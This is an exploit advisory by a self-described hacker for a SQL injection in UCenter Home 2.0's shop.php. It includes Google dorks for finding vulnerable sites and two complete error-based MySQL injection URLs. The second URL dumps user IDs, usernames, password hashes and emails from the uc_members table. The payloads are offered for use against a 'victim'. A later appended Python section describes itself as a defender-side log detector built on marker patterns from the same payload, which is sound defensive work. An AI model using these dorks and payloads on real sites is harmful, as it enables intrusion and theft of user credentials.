__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.
For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
You edit the DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
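
A defender-side way to spot this request pattern in web server access logs, as an added example that is not part of the original advisory. The log format, the sample lines and the function names `classify` and `suspicious` are constructed for illustration; the marker list is taken from the injected string shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers taken from the injected string shown in the advisory (MySQL error-based).
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"group\s+by", r"information_schema", r"concat\s*\(")]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (verdict, shopid) for a shop.php?ac=view request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if params.get("ac", [""])[0] != "view" or "shopid" not in params:
        return None
    shopid = params["shopid"][0]
    if re.fullmatch(r"[0-9]+", shopid):  # a legitimate shopid is a plain integer
        return ("ok", shopid)
    hits = sum(1 for p in MARKERS if p.search(shopid))
    return ("error-based-sqli" if hits >= 2 else "non-numeric", shopid)

def suspicious(lines):
    """Keep only the requests whose shopid is not a plain integer."""
    results = (classify(l) for l in lines)
    return [r for r in results if r and r[0] != "ok"]

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jan/2024:10:00:11 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for verdict, value in suspicious(SAMPLE_LOG):
        print(f"{verdict}: shopid={value[:60]!r}")
```

Any non-integer `shopid` is worth reviewing on its own; the marker count only separates the error-based pattern from other malformed input.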